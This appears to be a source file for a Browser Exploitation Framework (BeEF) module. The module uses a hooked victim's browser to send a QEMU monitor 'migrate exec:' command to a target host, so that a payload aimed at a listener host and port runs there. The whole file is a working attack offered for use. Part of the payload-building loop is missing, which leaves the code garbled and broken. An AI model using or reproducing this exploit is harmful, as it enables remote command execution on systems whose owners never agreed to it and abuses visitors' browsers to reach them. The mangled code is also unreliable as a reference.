// // Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var lhost = '<%= @lhost %>'; var lport = '<%= @lport %>'; var timeout = 5; var payload_name = '<%= @payload %>'; var peer = rhost + ':' + rport; payload = function() { var whitespace = ''; for (var i=0; i&1'"; payload = payload.replace(/ /g, whitespace); break; } return 'migrate "exec:' + payload + '"' } try { var code = payload(); beef.debug("[qemu_monitor_migrate_cmd_exec] " + peer + " - Sending payload (" + code.length + " bytes)"); var iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); } catch(e) { beef.debug("[qemu_monitor_migrate_cmd_exec] " + peer + " - Exploit failed: " + e.message); } cleanup = function() { try { document.body.removeChild(iframe_<%= @command_id %>); } catch(e) { beef.debug("[qemu_monitor_migrate_cmd_exec] Could not remove iframe: " + e.message); } } setTimeout("cleanup()", timeout*1000); });